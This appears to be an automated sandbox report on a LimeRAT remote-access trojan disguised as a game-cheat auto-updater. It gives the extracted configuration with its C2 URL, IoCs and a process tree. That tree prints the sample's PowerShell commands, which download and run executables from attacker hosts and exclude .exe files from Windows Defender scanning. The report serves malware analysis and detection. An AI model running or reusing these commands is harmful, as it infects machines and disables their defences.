limerat | 85fe23e69a61e733ce1070b20506ca9b48de1cd942e1a84b63022f78b86f50f1

Analysis

max time kernel
150s
max time network
148s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
21-01-2023 22:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

XEPHERSCRIPT_AUTO UPDATER.bat
Size

5KB
MD5

ef31796ce9eca35e3bdf8035761489f0
SHA1

8852224c5908797ab2903b0e24e44f89d7ecffb0
SHA256

85fe23e69a61e733ce1070b20506ca9b48de1cd942e1a84b63022f78b86f50f1
SHA512

0465abdf9dd5f4f1f479c34e7189037bad71f3be3de0bdd08ea73b0f35ee4071da60508dba9e7258083ae063bf8166c06c8591362311c53e3c2a6f3ab1fcd30d
SSDEEP

48:F2UGGmJ85J3ACH6l4wZgZASj66ZWSFCZCZvfHN+0gnpr2KWrHN+0Or0CZwlWZwZW:F2UJAWRGWxUGWKz4fRwdIlx

Score

10^/10

limerat evasion rat

Malware Config

Extracted

Family

limerat

Attributes

aes_key
$13377331$
antivm
true
c2_url
https://pastebin.com/raw/kpr8P98b
delay
20
download_payload
false
install
true
install_name
Microsoft Edge.exe
main_folder
UserProfile
pin_spread
false
sub_folder
\Microsoft\Edge\Application\Microsoft Edge\
usb_spread
false

Signatures

LimeRAT
Simple yet powerful RAT for Windows machines written in .NET.
rat limerat

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 2224 created 3620	2224	WerFault.exe	32

Suspicious use of NtCreateUserProcessOtherParentProcess 17 IoCs

description	pid	Process	procid_target
PID 4684 created 2068	4684	update.exe	35
PID 4684 created 2068	4684	update.exe	35
PID 4684 created 2068	4684	update.exe	35
PID 4684 created 2068	4684	update.exe	35
PID 4684 created 2068	4684	update.exe	35
PID 4684 created 2068	4684	update.exe	35
PID 2296 created 564	2296	powershell.EXE	3
PID 4760 created 2068	4760	updater.exe	35
PID 3556 created 4028	3556	svchost.exe	30
PID 3556 created 3620	3556	svchost.exe	32
PID 4760 created 2068	4760	updater.exe	35
PID 4760 created 2068	4760	updater.exe	35
PID 4760 created 2068	4760	updater.exe	35
PID 4760 created 2068	4760	updater.exe	35
PID 4760 created 2068	4760	updater.exe	35
PID 4760 created 2068	4760	updater.exe	35
PID 3556 created 3620	3556	svchost.exe	32

Blocklisted process makes network request 4 IoCs

flow	pid	Process
2	3268	powershell.exe
4	3268	powershell.exe
6	3520	powershell.exe
8	3520	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 6 IoCs

pid	Process
4520	XEPHERSCRIPT.exe
4684	update.exe
4820	msedge.exe
832	XEPHER SCRIPT.exe
4760	updater.exe
3932	Microsoft Edge.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Temp\XEPHER SCRIPT\XepherUPDATE_13.1DEC\XepherUPDATE_20_DEC\Xepher\data\icons_spells\desktop.ini	XEPHER SCRIPT.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\XEPHER SCRIPT\XepherUPDATE_13.1DEC\XepherUPDATE_20_DEC\Xepher\data\icons_spells\desktop.ini	XEPHER SCRIPT.exe
File created	C:\Users\Admin\AppData\Local\Temp\XEPHER SCRIPT\XepherUPDATE_13.1DEC\XepherUPDATE_20_DEC\Xepher\data\icons_champs\desktop.ini	XEPHER SCRIPT.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\XEPHER SCRIPT\XepherUPDATE_13.1DEC\XepherUPDATE_20_DEC\Xepher\data\icons_champs\desktop.ini	XEPHER SCRIPT.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 7 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	powershell.EXE
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 4684 set thread context of 1120	4684	update.exe	114
PID 2296 set thread context of 312	2296	powershell.EXE	128
PID 4760 set thread context of 3160	4760	updater.exe	154
PID 4760 set thread context of 4004	4760	updater.exe	160

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	update.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4724	sc.exe
4728	sc.exe
4696	sc.exe
2104	sc.exe
3484	sc.exe
4020	sc.exe
3140	sc.exe
4376	sc.exe
3564	sc.exe
3780	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
2796	3620	WerFault.exe	32
4280	4028	WerFault.exe	30
2224	3620	WerFault.exe	32

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4748	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2108	powershell.exe
2108	powershell.exe
2108	powershell.exe
3268	powershell.exe
3268	powershell.exe
3268	powershell.exe
4952	powershell.exe
4952	powershell.exe
4952	powershell.exe
3520	powershell.exe
3520	powershell.exe
3520	powershell.exe
4888	powershell.exe
4888	powershell.exe
4656	powershell.exe
4888	powershell.exe
4656	powershell.exe
4656	powershell.exe
4684	update.exe
4684	update.exe
4996	powershell.exe
4996	powershell.exe
4996	powershell.exe
4684	update.exe
4684	update.exe
4684	update.exe
4684	update.exe
4684	update.exe
4684	update.exe
1704	powershell.exe
1704	powershell.exe
1704	powershell.exe
4684	update.exe
4684	update.exe
4684	update.exe
4684	update.exe
4608	powershell.exe
4608	powershell.exe
4608	powershell.exe
2296	powershell.EXE
2296	powershell.EXE
4824	powershell.EXE
2296	powershell.EXE
4824	powershell.EXE
4824	powershell.EXE
2296	powershell.EXE
312	dllhost.exe
312	dllhost.exe
312	dllhost.exe
312	dllhost.exe
312	dllhost.exe
312	dllhost.exe
312	dllhost.exe
312	dllhost.exe
312	dllhost.exe
312	dllhost.exe
312	dllhost.exe
312	dllhost.exe
312	dllhost.exe
312	dllhost.exe
312	dllhost.exe
312	dllhost.exe
312	dllhost.exe
312	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2068	Explorer.EXE

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
636	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2108	powershell.exe
Token: SeDebugPrivilege	3268	powershell.exe
Token: SeDebugPrivilege	4952	powershell.exe
Token: SeIncreaseQuotaPrivilege	4952	powershell.exe
Token: SeSecurityPrivilege	4952	powershell.exe
Token: SeTakeOwnershipPrivilege	4952	powershell.exe
Token: SeLoadDriverPrivilege	4952	powershell.exe
Token: SeSystemProfilePrivilege	4952	powershell.exe
Token: SeSystemtimePrivilege	4952	powershell.exe
Token: SeProfSingleProcessPrivilege	4952	powershell.exe
Token: SeIncBasePriorityPrivilege	4952	powershell.exe
Token: SeCreatePagefilePrivilege	4952	powershell.exe
Token: SeBackupPrivilege	4952	powershell.exe
Token: SeRestorePrivilege	4952	powershell.exe
Token: SeShutdownPrivilege	4952	powershell.exe
Token: SeDebugPrivilege	4952	powershell.exe
Token: SeSystemEnvironmentPrivilege	4952	powershell.exe
Token: SeRemoteShutdownPrivilege	4952	powershell.exe
Token: SeUndockPrivilege	4952	powershell.exe
Token: SeManageVolumePrivilege	4952	powershell.exe
Token: 33	4952	powershell.exe
Token: 34	4952	powershell.exe
Token: 35	4952	powershell.exe
Token: 36	4952	powershell.exe
Token: SeDebugPrivilege	3520	powershell.exe
Token: SeDebugPrivilege	4888	powershell.exe
Token: SeDebugPrivilege	4656	powershell.exe
Token: SeDebugPrivilege	4996	powershell.exe
Token: SeIncreaseQuotaPrivilege	4996	powershell.exe
Token: SeSecurityPrivilege	4996	powershell.exe
Token: SeTakeOwnershipPrivilege	4996	powershell.exe
Token: SeLoadDriverPrivilege	4996	powershell.exe
Token: SeSystemProfilePrivilege	4996	powershell.exe
Token: SeSystemtimePrivilege	4996	powershell.exe
Token: SeProfSingleProcessPrivilege	4996	powershell.exe
Token: SeIncBasePriorityPrivilege	4996	powershell.exe
Token: SeCreatePagefilePrivilege	4996	powershell.exe
Token: SeBackupPrivilege	4996	powershell.exe
Token: SeRestorePrivilege	4996	powershell.exe
Token: SeShutdownPrivilege	4996	powershell.exe
Token: SeDebugPrivilege	4996	powershell.exe
Token: SeSystemEnvironmentPrivilege	4996	powershell.exe
Token: SeRemoteShutdownPrivilege	4996	powershell.exe
Token: SeUndockPrivilege	4996	powershell.exe
Token: SeManageVolumePrivilege	4996	powershell.exe
Token: 33	4996	powershell.exe
Token: 34	4996	powershell.exe
Token: 35	4996	powershell.exe
Token: 36	4996	powershell.exe
Token: SeDebugPrivilege	1704	powershell.exe
Token: SeShutdownPrivilege	2364	powercfg.exe
Token: SeCreatePagefilePrivilege	2364	powercfg.exe
Token: SeShutdownPrivilege	4616	powercfg.exe
Token: SeCreatePagefilePrivilege	4616	powercfg.exe
Token: SeShutdownPrivilege	3712	powercfg.exe
Token: SeCreatePagefilePrivilege	3712	powercfg.exe
Token: SeShutdownPrivilege	4468	powercfg.exe
Token: SeCreatePagefilePrivilege	4468	powercfg.exe
Token: SeIncreaseQuotaPrivilege	1704	powershell.exe
Token: SeSecurityPrivilege	1704	powershell.exe
Token: SeTakeOwnershipPrivilege	1704	powershell.exe
Token: SeLoadDriverPrivilege	1704	powershell.exe
Token: SeSystemProfilePrivilege	1704	powershell.exe
Token: SeSystemtimePrivilege	1704	powershell.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
4888	powershell.exe
4888	powershell.exe
996	dwm.exe
996	dwm.exe

Suspicious use of SendNotifyMessage 2 IoCs

pid	Process
4888	powershell.exe
4888	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
832	XEPHER SCRIPT.exe
832	XEPHER SCRIPT.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2364 wrote to memory of 2656	2364	cmd.exe	67
PID 2364 wrote to memory of 2656	2364	cmd.exe	67
PID 2656 wrote to memory of 2108	2656	cmd.exe	69
PID 2656 wrote to memory of 2108	2656	cmd.exe	69
PID 2656 wrote to memory of 3268	2656	cmd.exe	70
PID 2656 wrote to memory of 3268	2656	cmd.exe	70
PID 2656 wrote to memory of 3468	2656	cmd.exe	71
PID 2656 wrote to memory of 3468	2656	cmd.exe	71
PID 3468 wrote to memory of 1516	3468	cmd.exe	73
PID 3468 wrote to memory of 1516	3468	cmd.exe	73
PID 3468 wrote to memory of 4952	3468	cmd.exe	74
PID 3468 wrote to memory of 4952	3468	cmd.exe	74
PID 3468 wrote to memory of 3520	3468	cmd.exe	76
PID 3468 wrote to memory of 3520	3468	cmd.exe	76
PID 3468 wrote to memory of 4520	3468	cmd.exe	77
PID 3468 wrote to memory of 4520	3468	cmd.exe	77
PID 3468 wrote to memory of 4520	3468	cmd.exe	77
PID 4520 wrote to memory of 4656	4520	XEPHERSCRIPT.exe	78
PID 4520 wrote to memory of 4656	4520	XEPHERSCRIPT.exe	78
PID 4520 wrote to memory of 4656	4520	XEPHERSCRIPT.exe	78
PID 4520 wrote to memory of 4684	4520	XEPHERSCRIPT.exe	79
PID 4520 wrote to memory of 4684	4520	XEPHERSCRIPT.exe	79
PID 4520 wrote to memory of 4820	4520	XEPHERSCRIPT.exe	81
PID 4520 wrote to memory of 4820	4520	XEPHERSCRIPT.exe	81
PID 4520 wrote to memory of 4820	4520	XEPHERSCRIPT.exe	81
PID 4520 wrote to memory of 832	4520	XEPHERSCRIPT.exe	82
PID 4520 wrote to memory of 832	4520	XEPHERSCRIPT.exe	82
PID 4520 wrote to memory of 832	4520	XEPHERSCRIPT.exe	82
PID 3468 wrote to memory of 1428	3468	cmd.exe	83
PID 3468 wrote to memory of 1428	3468	cmd.exe	83
PID 3468 wrote to memory of 2796	3468	cmd.exe	84
PID 3468 wrote to memory of 2796	3468	cmd.exe	84
PID 3468 wrote to memory of 2140	3468	cmd.exe	85
PID 3468 wrote to memory of 2140	3468	cmd.exe	85
PID 3468 wrote to memory of 1852	3468	cmd.exe	86
PID 3468 wrote to memory of 1852	3468	cmd.exe	86
PID 3468 wrote to memory of 2104	3468	cmd.exe	87
PID 3468 wrote to memory of 2104	3468	cmd.exe	87
PID 3468 wrote to memory of 4616	3468	cmd.exe	88
PID 3468 wrote to memory of 4616	3468	cmd.exe	88
PID 3468 wrote to memory of 4888	3468	cmd.exe	89
PID 3468 wrote to memory of 4888	3468	cmd.exe	89
PID 1732 wrote to memory of 4696	1732	cmd.exe	99
PID 1732 wrote to memory of 4696	1732	cmd.exe	99
PID 1708 wrote to memory of 2364	1708	cmd.exe	100
PID 1708 wrote to memory of 2364	1708	cmd.exe	100
PID 1732 wrote to memory of 2104	1732	cmd.exe	101
PID 1732 wrote to memory of 2104	1732	cmd.exe	101
PID 1708 wrote to memory of 4616	1708	cmd.exe	102
PID 1708 wrote to memory of 4616	1708	cmd.exe	102
PID 1732 wrote to memory of 3484	1732	cmd.exe	103
PID 1732 wrote to memory of 3484	1732	cmd.exe	103
PID 1708 wrote to memory of 3712	1708	cmd.exe	104
PID 1708 wrote to memory of 3712	1708	cmd.exe	104
PID 1732 wrote to memory of 4376	1732	cmd.exe	105
PID 1732 wrote to memory of 4376	1732	cmd.exe	105
PID 1708 wrote to memory of 4468	1708	cmd.exe	106
PID 1708 wrote to memory of 4468	1708	cmd.exe	106
PID 1732 wrote to memory of 3564	1732	cmd.exe	107
PID 1732 wrote to memory of 3564	1732	cmd.exe	107
PID 1732 wrote to memory of 1212	1732	cmd.exe	123
PID 1732 wrote to memory of 1212	1732	cmd.exe	123
PID 1732 wrote to memory of 3152	1732	cmd.exe	109
PID 1732 wrote to memory of 3152	1732	cmd.exe	109

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:644

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:564
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Suspicious use of FindShellTrayWindow
  PID:996
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{ce2d9b3c-ce73-4882-ae1c-b35b92fed9f5}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:312

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:728

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:368

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1092

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1220

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1284

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1420

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s FontCache
1⤵
PID:1488

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1508

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1584

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1648

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1796

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2024

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1884

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2376

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2664

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:3592

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
PID:2860

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:5000

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4028
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 4028 -s 784
  2⤵
  - Program crash
  PID:4280

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3620
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3620 -s 872
  2⤵
  - Program crash
  PID:2796
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3620 -s 880
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  - Program crash
  PID:2224

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3452

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:2068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\XEPHERSCRIPT_AUTO UPDATER.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\XEPHERSCRIPT_AUTO UPDATER.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2656
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& {Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('DOWNLOADING LATEST VERSION OF XEPHERSCRIPT FOR THE CURRENT LEAGUE OF LEGENDS PATCH FROM OUR SERVER.', 'XEPHERSCRIPT AUTOUPDATE', 'OK', [System.Windows.Forms.MessageBoxIcon]::Information);}"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2108
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Powershell -Command "Invoke-Webrequest 'https://xepherscript.com/AUTOUPDATE/XEPHERSCRIPT_AUTOUPDATE.bat' -OutFile XEPHERSCRIPT_AUTOUPDATE.bat"
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3268
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K XEPHERSCRIPT_AUTOUPDATE.bat
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3468
    - - C:\Windows\system32\cacls.exe
        
        "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
        5⤵
        
        PID:1516
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Set-MpPreference -ExclusionExtension exe"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4952
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-Webrequest 'https://xepherhack.com/XEPHERSCRIPT/AUTOUPDATE/XEPHERSCRIPT.exe' -OutFile XEPHERSCRIPT.exe"
        5⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3520
    - - C:\Users\Admin\AppData\Local\Temp\XEPHERSCRIPT.exe
        
        XEPHERSCRIPT.exe
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4520
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
